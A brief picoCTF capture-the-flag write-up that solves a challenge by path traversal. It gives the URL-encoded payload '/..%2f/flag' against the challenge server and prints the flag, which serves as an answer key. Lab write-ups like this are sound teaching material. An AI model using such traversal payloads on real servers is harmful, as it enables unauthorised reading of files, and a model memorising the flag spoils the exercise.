The way I approached this problem was through path traversal due to the hint "The flag is at ../flag".
Resources: https://owasp.org/www-community/attacks/Path_Traversal
If you travel to "/..%2f/flag", you essentially travel a directory back, to where the flag is located
Full Url: http://mercury.picoctf.net:42449/..%2f/flag
picoCTF{th15_vu1n_1s_5up3r_53r1ous_y4ll_9d0864e2}